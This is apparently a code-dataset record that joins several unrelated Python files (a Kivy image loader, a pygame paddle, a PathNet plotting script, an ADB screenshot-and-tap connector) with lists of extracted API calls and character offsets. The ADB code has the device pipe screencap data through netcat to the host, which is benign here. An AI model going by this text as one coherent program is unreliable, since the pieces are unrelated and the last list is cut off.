_out_osfd, _out_filename = tempfile.mkstemp(
prefix='kivyloader', suffix=suffix)
if proto == 'smb':
# read from samba shares
fd = urllib_request.build_opener(SMBHandler).open(filename)
else:
# read from internet
fd = urllib_request.urlopen(filename)
idata = fd.read()
fd.close()
fd = None
# write to local filename
write(_out_osfd, idata)
close(_out_osfd)
_out_osfd = None
# load data
data = self._load_local(_out_filename, kwargs)
# FIXME create a clean API for that
for imdata in data._data:
imdata.source = filename
except Exception:
Logger.exception('Failed to load image <%s>' % filename)
# close file when remote file not found or download error
try:
close(_out_osfd)
except OSError:
pass
return self.error_image
finally:
if fd:
fd.close()
if _out_osfd:
close(_out_osfd)
if _out_filename != '':
unlink(_out_filename)
return data
def _update(self, *largs):
'''(internal) Check if a data is loaded, and pass to the client'''
# want to start it ?
if self._start_wanted:
if not self._running:
self.start()
self._start_wanted = False
# in pause mode, don't unqueue anything.
if self._paused:
self._trigger_update()
return
for x in range(self.max_upload_per_frame):
try:
filename, data = self._q_done.pop()
except IndexError:
return
# create the image
image = data # ProxyImage(data)
if not image.nocache:
Cache.append('kv.loader', filename, image)
# update client
for c_filename, client in self._client[:]:
if filename != c_filename:
continue
# got one client to update
client.image = image
client.loaded = True
client.dispatch('on_load')
self._client.remove((c_filename, client))
self._trigger_update()
def image(self, filename, load_callback=None, post_callback=None, **kwargs):
'''Load a image using the Loader. A ProxyImage is returned with a
loading image. You can use it as follows::
from kivy.app import App
from kivy.uix.image import Image
from kivy.loader import Loader
class TestApp(App):
def _image_loaded(self, proxyImage):
if proxyImage.image.texture:
self.image.texture = proxyImage.image.texture
def build(self):
proxyImage = Loader.image("myPic.jpg")
proxyImage.bind(on_load=self._image_loaded)
self.image = Image()
return self.image
TestApp().run()
In order to cancel all background loading, call *Loader.stop()*.
'''
data = Cache.get('kv.loader', filename)
if data not in (None, False):
# found image, if data is not here, need to reload.
return ProxyImage(data,
loading_image=self.loading_image,
loaded=True, **kwargs)
client = ProxyImage(self.loading_image,
loading_image=self.loading_image, **kwargs)
self._client.append((filename, client))
if data is None:
# if data is None, this is really the first time
self._q_load.appendleft({
'filename': filename,
'load_callback': load_callback,
'post_callback': post_callback,
'kwargs': kwargs})
if not kwargs.get('nocache', False):
Cache.append('kv.loader', filename, False)
self._start_wanted = True
self._trigger_update()
else:
# already queued for loading
pass
return client
#
# Loader implementation
#
if 'KIVY_DOC' in environ:
Loader = None
else:
#
# Try to use pygame as our first choice for loader
#
from kivy.compat import queue
from threading import Thread
class _Worker(Thread):
'''Thread executing tasks from a given tasks queue
'''
def __init__(self, pool, tasks):
Thread.__init__(self)
self.tasks = tasks
self.daemon = True
self.pool = pool
self.start()
def run(self):
while self.pool.running:
func, args, kargs = self.tasks.get()
try:
func(*args, **kargs)
except Exception as e:
print(e)
self.tasks.task_done()
class _ThreadPool(object):
'''Pool of threads consuming tasks from a queue
'''
def __init__(self, num_threads):
super(_ThreadPool, self).__init__()
self.running = True
self.tasks = queue.Queue()
for _ in range(num_threads):
_Worker(self, self.tasks)
def add_task(self, func, *args, **kargs):
'''Add a task to the queue
'''
self.tasks.put((func, args, kargs))
def stop(self):
self.running = False
self.tasks.join()
class LoaderThreadPool(LoaderBase):
def __init__(self):
super(LoaderThreadPool, self).__init__()
self.pool = None
def start(self):
super(LoaderThreadPool, self).start()
self.pool = _ThreadPool(self._num_workers)
Clock.schedule_interval(self.run, 0)
def stop(self):
super(LoaderThreadPool, self).stop()
Clock.unschedule(self.run)
self.pool.stop()
def run(self, *largs):
while self._running:
try:
parameters = self._q_load.pop()
except:
return
self.pool.add_task(self._load, parameters)
Loader = LoaderThreadPool()
Logger.info('Loader: using a thread pool of {} workers'.format(
Loader.num_workers))
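
# Illustrative tuning sketch (not part of the original module); the values are
# arbitrary and the URL is made up:
#
#     from kivy.loader import Loader
#     Loader.num_workers = 4
#     Loader.max_upload_per_frame = 4
#     proxy = Loader.image('http://example.com/test.png')
#     proxy.bind(on_load=lambda im: print('loaded', im))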
| [
"time.sleep",
"threading.Thread.__init__",
"collections.deque",
"kivy.cache.Cache.register",
"kivy.logger.Logger.exception",
"kivy.cache.Cache.append",
"os.unlink",
"urllib.request.build_opener",
"threading.Condition",
"urllib.request.urlopen",
"os.close",
"os.write",
"kivy.compat.queue.Queue",
"kivy.core.image.ImageLoader.load",
"kivy.clock.Clock.unschedule",
"tempfile.mkstemp",
"os.path.join",
"kivy.logger.Logger.warning",
"kivy.cache.Cache.get",
"kivy.clock.Clock.schedule_interval",
"kivy.clock.Clock.create_trigger"
] | [((1379, 1429), 'kivy.cache.Cache.register', 'Cache.register', (['"""kv.loader"""'], {'limit': '(500)', 'timeout': '(60)'}), "('kv.loader', limit=500, timeout=60)\n", (1393, 1429), False, 'from kivy.cache import Cache\n'), ((2461, 2482), 'threading.Condition', 'threading.Condition', ([], {}), '()\n', (2480, 2482), False, 'import threading\n'), ((2507, 2514), 'collections.deque', 'deque', ([], {}), '()\n', (2512, 2514), False, 'from collections import deque\n'), ((2538, 2545), 'collections.deque', 'deque', ([], {}), '()\n', (2543, 2545), False, 'from collections import deque\n'), ((2668, 2702), 'kivy.clock.Clock.create_trigger', 'Clock.create_trigger', (['self._update'], {}), '(self._update)\n', (2688, 2702), False, 'from kivy.clock import Clock\n'), ((8614, 8666), 'kivy.core.image.ImageLoader.load', 'ImageLoader.load', (['filename'], {'keep_data': '(True)'}), '(filename, keep_data=True, **kwargs)\n', (8630, 8666), False, 'from kivy.core.image import ImageLoader, Image\n'), ((12932, 12964), 'kivy.cache.Cache.get', 'Cache.get', (['"""kv.loader"""', 'filename'], {}), "('kv.loader', filename)\n", (12941, 12964), False, 'from kivy.cache import Cache\n'), ((2752, 2782), 'kivy.clock.Clock.unschedule', 'Clock.unschedule', (['self._update'], {}), '(self._update)\n', (2768, 2782), False, 'from kivy.clock import Clock\n'), ((5090, 5140), 'os.path.join', 'join', (['kivy_data_dir', '"""images"""', '"""image-loading.gif"""'], {}), "(kivy_data_dir, 'images', 'image-loading.gif')\n", (5094, 5140), False, 'from os.path import join\n'), ((5175, 5216), 'kivy.core.image.ImageLoader.load', 'ImageLoader.load', ([], {'filename': 'loading_png_fn'}), '(filename=loading_png_fn)\n', (5191, 5216), False, 'from kivy.core.image import ImageLoader, Image\n'), ((5370, 5402), 'kivy.core.image.ImageLoader.load', 'ImageLoader.load', ([], {'filename': 'image'}), '(filename=image)\n', (5386, 5402), False, 'from kivy.core.image import ImageLoader, Image\n'), ((5800, 5854), 'os.path.join', 'join', (['"""atlas://data/images/defaulttheme/image-missing"""'], {}), "('atlas://data/images/defaulttheme/image-missing')\n", (5804, 5854), False, 'from os.path import join\n'), ((5904, 5943), 'kivy.core.image.ImageLoader.load', 'ImageLoader.load', ([], {'filename': 'error_png_fn'}), '(filename=error_png_fn)\n', (5920, 5943), False, 'from kivy.core.image import ImageLoader, Image\n'), ((6091, 6123), 'kivy.core.image.ImageLoader.load', 'ImageLoader.load', ([], {'filename': 'image'}), '(filename=image)\n', (6107, 6123), False, 'from kivy.core.image import ImageLoader, Image\n'), ((7627, 7637), 'time.sleep', 'sleep', (['(0.1)'], {}), '(0.1)\n', (7632, 7637), False, 'from time import sleep\n'), ((9610, 9662), 'tempfile.mkstemp', 'tempfile.mkstemp', ([], {'prefix': '"""kivyloader"""', 'suffix': 'suffix'}), "(prefix='kivyloader', suffix=suffix)\n", (9626, 9662), False, 'import tempfile\n'), ((10068, 10091), 'os.write', 'write', (['_out_osfd', 'idata'], {}), '(_out_osfd, idata)\n', (10073, 10091), False, 'from os import write, close, unlink, environ\n'), ((10104, 10120), 'os.close', 'close', (['_out_osfd'], {}), '(_out_osfd)\n', (10109, 10120), False, 'from os import write, close, unlink, environ\n'), ((14301, 14322), 'threading.Thread.__init__', 'Thread.__init__', (['self'], {}), '(self)\n', (14316, 14322), False, 'from threading import Thread\n'), ((14968, 14981), 'kivy.compat.queue.Queue', 'queue.Queue', ([], {}), '()\n', (14979, 14981), False, 'from kivy.compat import queue\n'), ((15601, 15637), 'kivy.clock.Clock.schedule_interval', 
'Clock.schedule_interval', (['self.run', '(0)'], {}), '(self.run, 0)\n', (15624, 15637), False, 'from kivy.clock import Clock\n'), ((15724, 15750), 'kivy.clock.Clock.unschedule', 'Clock.unschedule', (['self.run'], {}), '(self.run)\n', (15740, 15750), False, 'from kivy.clock import Clock\n'), ((9909, 9941), 'urllib.request.urlopen', 'urllib_request.urlopen', (['filename'], {}), '(filename)\n', (9931, 9941), True, 'import urllib.request as urllib_request\n'), ((10400, 10456), 'kivy.logger.Logger.exception', 'Logger.exception', (["('Failed to load image <%s>' % filename)"], {}), "('Failed to load image <%s>' % filename)\n", (10416, 10456), False, 'from kivy.logger import Logger\n'), ((10767, 10783), 'os.close', 'close', (['_out_osfd'], {}), '(_out_osfd)\n', (10772, 10783), False, 'from os import write, close, unlink, environ\n'), ((10836, 10857), 'os.unlink', 'unlink', (['_out_filename'], {}), '(_out_filename)\n', (10842, 10857), False, 'from os import write, close, unlink, environ\n'), ((11579, 11621), 'kivy.cache.Cache.append', 'Cache.append', (['"""kv.loader"""', 'filename', 'image'], {}), "('kv.loader', filename, image)\n", (11591, 11621), False, 'from kivy.cache import Cache\n'), ((13720, 13762), 'kivy.cache.Cache.append', 'Cache.append', (['"""kv.loader"""', 'filename', '(False)'], {}), "('kv.loader', filename, False)\n", (13732, 13762), False, 'from kivy.cache import Cache\n'), ((9295, 9366), 'kivy.logger.Logger.warning', 'Logger.warning', (['"""Loader: can not load PySMB: make sure it is installed"""'], {}), "('Loader: can not load PySMB: make sure it is installed')\n", (9309, 9366), False, 'from kivy.logger import Logger\n'), ((10560, 10576), 'os.close', 'close', (['_out_osfd'], {}), '(_out_osfd)\n', (10565, 10576), False, 'from os import write, close, unlink, environ\n'), ((9778, 9817), 'urllib.request.build_opener', 'urllib_request.build_opener', (['SMBHandler'], {}), '(SMBHandler)\n', (9805, 9817), True, 'import urllib.request as urllib_request\n')] |
import os
os.environ["PYGAME_HIDE_SUPPORT_PROMPT"] = "hide"
import pygame
RENDER_RATIO = 2
class CakePaddle(pygame.sprite.Sprite):
def __init__(self, speed=12):
# surf is the right-most (largest) tier of the cake
self.surf = pygame.Surface((30 // RENDER_RATIO, 120 // RENDER_RATIO))
self.rect = self.surf.get_rect()
self.surf2 = pygame.Surface((30 // RENDER_RATIO, 80 // RENDER_RATIO))
self.rect2 = self.surf2.get_rect()
self.surf3 = pygame.Surface((30 // RENDER_RATIO, 40 // RENDER_RATIO))
self.rect3 = self.surf3.get_rect()
self.surf4 = pygame.Surface((30 // RENDER_RATIO, 10 // RENDER_RATIO))
self.rect4 = self.surf4.get_rect()
self.speed = speed
def reset(self):
# self.rect is set from envs class
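        # chain each smaller tier so its right edge sits on the left edge of the previous tier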
self.rect2.midright = self.rect.midleft
self.rect3.midright = self.rect2.midleft
self.rect4.midright = self.rect3.midleft
def draw(self, screen):
pygame.draw.rect(screen, (255, 255, 255), self.rect)
pygame.draw.rect(screen, (255, 255, 255), self.rect2)
pygame.draw.rect(screen, (255, 255, 255), self.rect3)
pygame.draw.rect(screen, (255, 255, 255), self.rect4)
def update(self, area, action):
# action: 1 - up, 2 - down
movepos = [0, 0]
if action == 1:
movepos[1] = movepos[1] - self.speed
elif action == 2:
movepos[1] = movepos[1] + self.speed
newpos = self.rect.move(movepos)
if area.contains(newpos):
self.rect = newpos
# move other rects too
self.rect2 = self.rect2.move(movepos)
self.rect3 = self.rect3.move(movepos)
self.rect4 = self.rect4.move(movepos)
def process_collision(self, b_rect, dx, dy, b_speed, paddle_type):
"""
Parameters
----------
b_rect : Ball rect
dx, dy : Ball speed along single axis
b_speed : Ball speed
        paddle_type : ignored by the cake paddle
        Returns
        -------
        is_collision: True if the ball collides with the paddle
b_rect: new ball rect
b_speed: new ball speed
"""
if self.rect4.colliderect(b_rect):
is_collision = True
if dx > 0:
b_rect.right = self.rect4.left
b_speed[0] = -b_speed[0]
# top or bottom edge
elif dy > 0:
b_rect.bottom = self.rect4.top
b_speed[1] = -b_speed[1]
elif dy < 0:
b_rect.top = self.rect4.bottom
b_speed[1] = -b_speed[1]
return is_collision, b_rect, b_speed
elif self.rect3.colliderect(b_rect):
is_collision = True
if dx > 0:
b_rect.right = self.rect3.left
b_speed[0] = -b_speed[0]
# top or bottom edge
elif dy > 0:
b_rect.bottom = self.rect3.top
b_speed[1] = -b_speed[1]
elif dy < 0:
b_rect.top = self.rect3.bottom
b_speed[1] = -b_speed[1]
return is_collision, b_rect, b_speed
elif self.rect2.colliderect(b_rect):
is_collision = True
if dx > 0:
b_rect.right = self.rect2.left
b_speed[0] = -b_speed[0]
# top or bottom edge
elif dy > 0:
b_rect.bottom = self.rect2.top
b_speed[1] = -b_speed[1]
elif dy < 0:
b_rect.top = self.rect2.bottom
b_speed[1] = -b_speed[1]
return is_collision, b_rect, b_speed
elif self.rect.colliderect(b_rect):
is_collision = True
if dx > 0:
b_rect.right = self.rect.left
b_speed[0] = -b_speed[0]
# top or bottom edge
elif dy > 0:
b_rect.bottom = self.rect.top
b_speed[1] = -b_speed[1]
elif dy < 0:
b_rect.top = self.rect.bottom
b_speed[1] = -b_speed[1]
return is_collision, b_rect, b_speed
return False, b_rect, b_speed
| [
"pygame.draw.rect",
"pygame.Surface"
] | [((249, 306), 'pygame.Surface', 'pygame.Surface', (['(30 // RENDER_RATIO, 120 // RENDER_RATIO)'], {}), '((30 // RENDER_RATIO, 120 // RENDER_RATIO))\n', (263, 306), False, 'import pygame\n'), ((369, 425), 'pygame.Surface', 'pygame.Surface', (['(30 // RENDER_RATIO, 80 // RENDER_RATIO)'], {}), '((30 // RENDER_RATIO, 80 // RENDER_RATIO))\n', (383, 425), False, 'import pygame\n'), ((490, 546), 'pygame.Surface', 'pygame.Surface', (['(30 // RENDER_RATIO, 40 // RENDER_RATIO)'], {}), '((30 // RENDER_RATIO, 40 // RENDER_RATIO))\n', (504, 546), False, 'import pygame\n'), ((611, 667), 'pygame.Surface', 'pygame.Surface', (['(30 // RENDER_RATIO, 10 // RENDER_RATIO)'], {}), '((30 // RENDER_RATIO, 10 // RENDER_RATIO))\n', (625, 667), False, 'import pygame\n'), ((987, 1039), 'pygame.draw.rect', 'pygame.draw.rect', (['screen', '(255, 255, 255)', 'self.rect'], {}), '(screen, (255, 255, 255), self.rect)\n', (1003, 1039), False, 'import pygame\n'), ((1048, 1101), 'pygame.draw.rect', 'pygame.draw.rect', (['screen', '(255, 255, 255)', 'self.rect2'], {}), '(screen, (255, 255, 255), self.rect2)\n', (1064, 1101), False, 'import pygame\n'), ((1110, 1163), 'pygame.draw.rect', 'pygame.draw.rect', (['screen', '(255, 255, 255)', 'self.rect3'], {}), '(screen, (255, 255, 255), self.rect3)\n', (1126, 1163), False, 'import pygame\n'), ((1172, 1225), 'pygame.draw.rect', 'pygame.draw.rect', (['screen', '(255, 255, 255)', 'self.rect4'], {}), '(screen, (255, 255, 255), self.rect4)\n', (1188, 1225), False, 'import pygame\n')] |
import argparse
import os
import pickle
import numpy as np
import matplotlib.pyplot as plt
plt.style.use('ggplot')
parser = argparse.ArgumentParser(description='PyTorch MNIST Example')
parser.add_argument('--mnist', action='store_true', default=False,
help='open mnist result')
args = parser.parse_args()
def subplot(subplot, data_first, data_second, title):
plt.subplot(subplot)
if args.mnist:
x = np.arange(0,100)
else:
x = np.arange(0,500)
y_first = np.mean(data_first, axis=0)
y_second = np.mean(data_second, axis=0)
y_first_err = np.std(data_first, axis=0) / 2.
y_second_err = np.std(data_second, axis=0) / 2.
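    # shade a half-standard-deviation band around each mean accuracy curve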
plt.fill_between(x, y_first - y_first_err, y_first + y_first_err, color='m', alpha=0.3)
plt.fill_between(x, y_second - y_second_err, y_second + y_second_err, color='c', alpha=0.3)
plt.plot(x, y_first, color='r', label='Task A')
plt.plot(x, y_second, color='g', label='Task B (transfer learning)')
plt.legend(bbox_to_anchor=(0.8, 0.3), loc=2, ncol=1, fontsize=15)
axes = plt.gca()
if args.mnist:
axes.set_xlim([0, 100])
axes.set_ylim([0, 1.2])
else:
axes.set_xlim([0, 500])
axes.set_ylim([0, 0.6])
plt.title(title, fontsize=20, y = 0.9)
plt.ylabel('Accuracy',fontsize=15)
plt.xlabel('Generations',fontsize=15)
plt.grid(True)
try:
if args.mnist:
        f = open(os.path.join('./result/result_mnist.pickle'), 'rb')  # pickle needs a binary-mode file in Python 3
result = pickle.load(f)
f.close()
pathnet_first = []
pathnet_second = []
for res in result:
pathnet_first.append(res[2])
pathnet_second.append(res[3])
subplot('111', pathnet_first, pathnet_second,'MNIST')
plt.show()
else:
        f = open(os.path.join('./result/result_cifar_svhn.pickle'), 'rb')  # pickle needs a binary-mode file in Python 3
result = pickle.load(f)
f.close()
cifar_first = []
cifar_second = []
svhn_first = []
svhn_second = []
for res in result:
if res[0] == 'pathnet_cifar_first':
cifar_first.append(res[2])
svhn_second.append(res[3])
else:
svhn_first.append(res[2])
cifar_second.append(res[3])
subplot('211', cifar_first, cifar_second,'CIFAR-10')
subplot('212', svhn_first, svhn_second,'cSVHN')
plt.show()
except IOError:
print("Result file does not exist")
| [
"numpy.mean",
"matplotlib.pyplot.grid",
"argparse.ArgumentParser",
"matplotlib.pyplot.ylabel",
"numpy.arange",
"matplotlib.pyplot.gca",
"matplotlib.pyplot.xlabel",
"matplotlib.pyplot.plot",
"pickle.load",
"matplotlib.pyplot.style.use",
"os.path.join",
"matplotlib.pyplot.fill_between",
"numpy.std",
"matplotlib.pyplot.title",
"matplotlib.pyplot.subplot",
"matplotlib.pyplot.legend",
"matplotlib.pyplot.show"
] | [((91, 114), 'matplotlib.pyplot.style.use', 'plt.style.use', (['"""ggplot"""'], {}), "('ggplot')\n", (104, 114), True, 'import matplotlib.pyplot as plt\n'), ((125, 185), 'argparse.ArgumentParser', 'argparse.ArgumentParser', ([], {'description': '"""PyTorch MNIST Example"""'}), "(description='PyTorch MNIST Example')\n", (148, 185), False, 'import argparse\n'), ((386, 406), 'matplotlib.pyplot.subplot', 'plt.subplot', (['subplot'], {}), '(subplot)\n', (397, 406), True, 'import matplotlib.pyplot as plt\n'), ((508, 535), 'numpy.mean', 'np.mean', (['data_first'], {'axis': '(0)'}), '(data_first, axis=0)\n', (515, 535), True, 'import numpy as np\n'), ((551, 579), 'numpy.mean', 'np.mean', (['data_second'], {'axis': '(0)'}), '(data_second, axis=0)\n', (558, 579), True, 'import numpy as np\n'), ((692, 783), 'matplotlib.pyplot.fill_between', 'plt.fill_between', (['x', '(y_first - y_first_err)', '(y_first + y_first_err)'], {'color': '"""m"""', 'alpha': '(0.3)'}), "(x, y_first - y_first_err, y_first + y_first_err, color='m',\n alpha=0.3)\n", (708, 783), True, 'import matplotlib.pyplot as plt\n'), ((784, 880), 'matplotlib.pyplot.fill_between', 'plt.fill_between', (['x', '(y_second - y_second_err)', '(y_second + y_second_err)'], {'color': '"""c"""', 'alpha': '(0.3)'}), "(x, y_second - y_second_err, y_second + y_second_err, color\n ='c', alpha=0.3)\n", (800, 880), True, 'import matplotlib.pyplot as plt\n'), ((880, 927), 'matplotlib.pyplot.plot', 'plt.plot', (['x', 'y_first'], {'color': '"""r"""', 'label': '"""Task A"""'}), "(x, y_first, color='r', label='Task A')\n", (888, 927), True, 'import matplotlib.pyplot as plt\n'), ((932, 1000), 'matplotlib.pyplot.plot', 'plt.plot', (['x', 'y_second'], {'color': '"""g"""', 'label': '"""Task B (transfer learning)"""'}), "(x, y_second, color='g', label='Task B (transfer learning)')\n", (940, 1000), True, 'import matplotlib.pyplot as plt\n'), ((1005, 1070), 'matplotlib.pyplot.legend', 'plt.legend', ([], {'bbox_to_anchor': '(0.8, 0.3)', 'loc': '(2)', 'ncol': '(1)', 'fontsize': '(15)'}), '(bbox_to_anchor=(0.8, 0.3), loc=2, ncol=1, fontsize=15)\n', (1015, 1070), True, 'import matplotlib.pyplot as plt\n'), ((1082, 1091), 'matplotlib.pyplot.gca', 'plt.gca', ([], {}), '()\n', (1089, 1091), True, 'import matplotlib.pyplot as plt\n'), ((1254, 1290), 'matplotlib.pyplot.title', 'plt.title', (['title'], {'fontsize': '(20)', 'y': '(0.9)'}), '(title, fontsize=20, y=0.9)\n', (1263, 1290), True, 'import matplotlib.pyplot as plt\n'), ((1297, 1332), 'matplotlib.pyplot.ylabel', 'plt.ylabel', (['"""Accuracy"""'], {'fontsize': '(15)'}), "('Accuracy', fontsize=15)\n", (1307, 1332), True, 'import matplotlib.pyplot as plt\n'), ((1336, 1374), 'matplotlib.pyplot.xlabel', 'plt.xlabel', (['"""Generations"""'], {'fontsize': '(15)'}), "('Generations', fontsize=15)\n", (1346, 1374), True, 'import matplotlib.pyplot as plt\n'), ((1378, 1392), 'matplotlib.pyplot.grid', 'plt.grid', (['(True)'], {}), '(True)\n', (1386, 1392), True, 'import matplotlib.pyplot as plt\n'), ((2393, 2403), 'matplotlib.pyplot.show', 'plt.show', ([], {}), '()\n', (2401, 2403), True, 'import matplotlib.pyplot as plt\n'), ((438, 455), 'numpy.arange', 'np.arange', (['(0)', '(100)'], {}), '(0, 100)\n', (447, 455), True, 'import numpy as np\n'), ((477, 494), 'numpy.arange', 'np.arange', (['(0)', '(500)'], {}), '(0, 500)\n', (486, 494), True, 'import numpy as np\n'), ((598, 624), 'numpy.std', 'np.std', (['data_first'], {'axis': '(0)'}), '(data_first, axis=0)\n', (604, 624), True, 'import numpy as np\n'), ((649, 676), 'numpy.std', 
'np.std', (['data_second'], {'axis': '(0)'}), '(data_second, axis=0)\n', (655, 676), True, 'import numpy as np\n'), ((1500, 1514), 'pickle.load', 'pickle.load', (['f'], {}), '(f)\n', (1511, 1514), False, 'import pickle\n'), ((1770, 1780), 'matplotlib.pyplot.show', 'plt.show', ([], {}), '()\n', (1778, 1780), True, 'import matplotlib.pyplot as plt\n'), ((1878, 1892), 'pickle.load', 'pickle.load', (['f'], {}), '(f)\n', (1889, 1892), False, 'import pickle\n'), ((1437, 1481), 'os.path.join', 'os.path.join', (['"""./result/result_mnist.pickle"""'], {}), "('./result/result_mnist.pickle')\n", (1449, 1481), False, 'import os\n'), ((1810, 1859), 'os.path.join', 'os.path.join', (['"""./result/result_cifar_svhn.pickle"""'], {}), "('./result/result_cifar_svhn.pickle')\n", (1822, 1859), False, 'import os\n')] |
import os
import logging.config
from random import randint
import zlib
import struct
import socket
import time
from PIL import Image
import config
# from config import ADB_ROOT, ADB_HOST, SCREEN_SHOOT_SAVE_PATH, ShellColor, CONFIG_PATH,enable_adb_host_auto_detect, ADB_SERVER
from .ADBClientSession import ADBClientSession
from util.socketutil import recvall
from . import revconn
# from numpy import average, dot, linalg
logger = logging.getLogger(__name__)
def _screencap_to_image(cap):
w, h, pixels = cap
return Image.frombytes('RGBA', (w, h), pixels)
def _ensure_pil_image(imgorfile):
if isinstance(imgorfile, Image.Image):
return imgorfile
return Image.open(imgorfile)
def check_adb_alive():
try:
sess = ADBClientSession(config.ADB_SERVER)
version = int(sess.service('host:version').read_response().decode(), 16)
logger.debug('ADB server version %d', version)
return True
except ConnectionRefusedError:
return False
except RuntimeError:
return False
def ensure_adb_alive():
if check_adb_alive():
return
    logger.info('trying to start the adb server')
import subprocess
adbbin = config.get('device/adb_binary', None)
if adbbin is None:
adb_binaries = ['adb', os.path.join(config.ADB_ROOT, 'adb')]
else:
adb_binaries = [adbbin]
for adbbin in adb_binaries:
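        # try each candidate binary until one of them starts the adb server successfully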
try:
logger.debug('trying %r', adbbin)
subprocess.run([adbbin, 'start-server'], check=True)
return True
except FileNotFoundError:
pass
except subprocess.CalledProcessError:
pass
raise OSError("can't start adb server")
class ADBConnector:
def __init__(self, adb_serial=None):
# os.chdir(ADB_ROOT)
self.ADB_ROOT = config.ADB_ROOT
self.adb_serial = adb_serial
self.host_session_factory = lambda: ADBClientSession(config.ADB_SERVER)
self.rch = None
if self.adb_serial is None:
self.adb_serial = self.__adb_device_name_detector()
self.device_session_factory = lambda: self.host_session_factory().device(self.adb_serial)
self.cache_screenshot = config.get('device/cache_screenshot', True)
self.last_screenshot_timestamp = 0
self.last_screenshot_duration = 0
self.last_screenshot = None
if config.get('device/try_emulator_enhanced_mode', True):
loopbacks = self._detect_loopbacks()
if len(loopbacks):
logger.debug('possible loopback addresses: %s', repr(loopbacks))
self.rch = revconn.ReverseConnectionHost()
self.rch.start()
if self._test_reverse_connection(loopbacks):
                    logger.info('using emulator enhanced mode')
self.screencap = self._reverse_connection_screencap
else:
self.rch.stop()
else:
self.loopback = None
def __del__(self):
if self.rch and self.rch.is_alive():
self.rch.stop()
def __adb_device_name_detector(self):
devices = [x for x in self.host_session_factory().devices() if x[1] != 'offline']
if len(devices) == 0:
auto_connect = config.get('device/adb_auto_connect', None)
if auto_connect is not None:
                logger.info('no connected device, trying to connect to %s', auto_connect)
try:
self.host_session_factory().disconnect(auto_connect)
except:
pass
self.host_session_factory().connect(auto_connect)
else:
                raise RuntimeError('no usable device found')
devices = [x for x in self.host_session_factory().devices() if x[1] != 'offline']
always_use_device = config.get('device/adb_always_use_device', None)
if always_use_device is not None:
if always_use_device not in (x[0] for x in devices):
                raise RuntimeError('device %s is not connected' % always_use_device)
return always_use_device
if len(devices) == 1:
device_name = devices[0][0]
elif len(devices) > 1:
logger.info("检测到多台设备")
num = 0
while True:
try:
num = int(input("请输入序号选择设备: "))
if not 0 <= num < len(devices):
raise ValueError()
break
except ValueError:
logger.error("输入不合法,请重新输入")
device_name = devices[num][0]
else:
            raise RuntimeError('no usable device found')
logger.info("确认设备名称:" + device_name)
return device_name
def run_device_cmd(self, cmd, DEBUG_LEVEL=2):
output = self.device_session_factory().exec(cmd)
logger.debug("command: %s", cmd)
logger.debug("output: %s", repr(output))
return output
def get_sub_screen(self, image, screen_range):
return image.crop(
(
screen_range[0][0],
screen_range[0][1],
screen_range[0][0] + screen_range[1][0],
screen_range[0][1] + screen_range[1][1]
)
)
def _detect_loopbacks(self):
board = self.device_session_factory().exec('getprop ro.product.board')
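        # the stock Android emulator (goldfish) always exposes the host machine at 10.0.2.2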
if b'goldfish' in board:
return ['10.0.2.2']
modules = self.device_session_factory().exec('grep -o vboxguest /proc/modules')
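        # VirtualBox-based emulators load vboxguest; the host is then reachable via an address from the ARP table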
if b'vboxguest' in modules:
arp = self.device_session_factory().exec('cat /proc/net/arp')
return [x[:x.find(b' ')].decode() for x in arp.splitlines()[1:]]
return []
def _test_reverse_connection(self, loopbacks):
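        # ask the device to echo a one-time cookie back to this host over netcat;
        # if the cookie arrives, that loopback address really reaches us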
for addr in loopbacks:
logger.debug('testing loopback address %s', addr)
future = self.rch.register_cookie()
with future:
cmd = 'echo -n %sOKAY | nc -w 1 %s %d' % (future.cookie.decode(), addr, self.rch.port)
logger.debug(cmd)
control_sock = self.device_session_factory().exec_stream(cmd)
with control_sock:
conn = future.get(2)
if conn is not None:
data = recvall(conn)
conn.close()
if data == b'OKAY':
self.loopback = addr
logger.debug('found loopback address %s', addr)
return True
return False
def screencap_png(self):
"""returns PNG bytes"""
s = self.device_session_factory().exec_stream('screencap -p')
data = recvall(s, 4194304)
return data
def screencap(self):
"""returns (width, height, pixels)
pixels in RGBA/RGBX format"""
s = self.device_session_factory().exec_stream('screencap|gzip -1')
data = recvall(s, 4194304)
s.close()
data = zlib.decompress(data, zlib.MAX_WBITS | 16, 8388608)
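        # the raw framebuffer starts with three uint32 header values: width, height and pixel format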
w, h, f = struct.unpack_from('III', data, 0)
assert (f == 1)
return (w, h, data[12:])
def _reverse_connection_screencap(self):
"""returns (width, height, pixels)
pixels in RGBA/RGBX format"""
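        # let the device stream the screencap straight to our listening socket,
        # matching the connection by a one-time cookie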
future = self.rch.register_cookie()
with future:
control_sock = self.device_session_factory().exec_stream('(echo -n %s; screencap) | nc %s %d' % (future.cookie.decode(), self.loopback, self.rch.port))
with control_sock:
with future.get() as conn:
data = recvall(conn, 8388608, True)
w, h, f = struct.unpack_from('III', data, 0)
assert (f == 1)
return (w, h, data[12:].tobytes())
def screenshot(self, cached=True):
t0 = time.monotonic()
if cached and self.cache_screenshot:
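            # reuse the previous frame while it is younger than the time the last capture took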
if self.last_screenshot is not None and t0 - self.last_screenshot_timestamp < self.last_screenshot_duration:
return self.last_screenshot
rawcap = self.screencap()
img = _screencap_to_image(rawcap)
t1 = time.monotonic()
self.last_screenshot_timestamp = t1
self.last_screenshot_duration = t1 - t0
self.last_screenshot = img
return img
def touch_swipe2(self, origin, movement, duration=None):
# sleep(1)
x1, y1, x2, y2 = origin[0], origin[1], origin[0] + movement[0], origin[1] + movement[1]
logger.debug("滑动初始坐标:({},{}); 移动距离dX:{}, dy:{}".format(*origin, *movement))
command = "input swipe {} {} {} {} ".format(x1, y1, x2, y2)
if duration is not None:
command += str(int(duration))
self.run_device_cmd(command)
def touch_tap(self, XY=None, offsets=None):
# sleep(10)
# sleep(0.5)
if offsets is not None:
final_X = XY[0] + randint(-offsets[0], offsets[0])
final_Y = XY[1] + randint(-offsets[1], offsets[1])
else:
final_X = XY[0] + randint(-1, 1)
final_Y = XY[1] + randint(-1, 1)
        # If you run into problems, include this output when sharing your log in the group chat.
        logger.debug("tap at ({},{})".format(final_X, final_Y))
command = "input tap {} {}".format(final_X,
final_Y)
self.run_device_cmd(command)
| [
"PIL.Image.open",
"config.get",
"time.monotonic",
"subprocess.run",
"os.path.join",
"util.socketutil.recvall",
"PIL.Image.frombytes",
"random.randint",
"zlib.decompress",
"struct.unpack_from"
